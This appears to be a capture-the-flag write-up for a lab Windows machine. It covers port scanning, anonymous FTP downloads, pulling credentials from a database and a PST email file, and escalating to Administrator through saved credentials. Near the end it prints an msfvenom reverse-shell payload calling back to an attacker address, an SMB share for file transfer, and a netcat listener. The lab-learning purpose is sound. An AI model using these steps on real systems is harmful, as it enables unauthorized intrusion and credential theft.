-
The first step is to perform a scan of the open ports and then list the versions and technologies used on the open ports.
nmap -p- --open -vvv --min-rate 3000 -Pn -sS 10.10.10.98 -oG scan
/opt/extractports scan
nmap -p21,23,80 -Pn -sCV 10.10.10.98 -oN ports
- With the initial recognition I see that port 21 allows logging in with anonymous credentials.
-
I find 2 directories and each of them contains a file. I switch to binary mode and download the files.
binary
get Backups/backup.mdb
get Engineer/Access Control.zip
-
I start by viewing the database schema, query the tables and decide to view the contents of the auth_user table. Within it I find 3 entries with potential credentials.
mdb-tables backup.mdb
mdb-schema backup.mdb
mdb-sql backup.mdb
select id,username,password from auth_user;
-
When I try to use the engineer credential via telnet on port 23 I get a different error message than if I use other credentials.
-
When unzipping the zip file it asks me for a password. I try with the credentials found and I see that the user engineer is correct and I manage to unzip.
- An
Access Control.pst file is decompressed. A PST file, or personal storage table file, is a file format used to store e-mail messages, contacts and other items.
-
To be able to read the content of the file I use readpst and it generates a file that I can consult its content.
-
When reading the email I find some credentials for the security user. I use these credentials to connect via telnet on port 23 and get access to the system and read the first flag.
- To increase my privileges I start listing files in the common directories and find a link inside the public desktop.
-
When consulting its content I see that the terminal has stored the Administrator user credentials.
-
I share an smb service to transfer files between my machine and the victim’s machine.
sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test
net use n: \\10.10.14.10\share /user:test test
-
I generate a binary to create a reverse shell. I run the binary using the stored credentials and I get a shell as Administrator and I can read the second system flag.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.10 LPORT=1234 -f exe > pepe.exe
nc -nlvp 1234
runas /user:ACCESS\Administrator /savecred "C:\temp\pepe.exe"
